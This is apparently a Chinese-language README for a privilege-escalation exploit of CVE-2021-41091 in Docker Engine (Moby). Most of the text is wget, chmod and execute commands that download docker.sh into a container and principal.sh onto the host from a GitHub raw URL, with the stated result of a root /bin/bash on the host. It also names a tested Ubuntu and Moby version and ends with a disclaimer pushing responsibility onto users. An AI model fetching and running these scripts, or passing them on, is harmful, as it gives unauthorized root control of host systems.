Moby(Docker Engine)中的一个漏洞允许无权限用户在宿主机上遍历目录并直接执行 Docker 中的程序。如果 Docker 中存在 suid 程序,用户可在宿主机上以 suid 身份执行它。
在容器终端中下载 docker.sh 文件,然后以 root 用户身份执行:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
现在在宿主机中下载 principal.sh 文件并执行:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
执行该命令后,我们将获得文件,并能够以 root 身份运行 /bin/bash。
这些脚本已在 Ubuntu 20.04.6 LTS(GNU/Linux 5.4.0-147-generic x86_64)上测试,Moby 版本为 20.10.5+dfsg1。
使用此存储库的责任由使用者自行承担,与作者无关。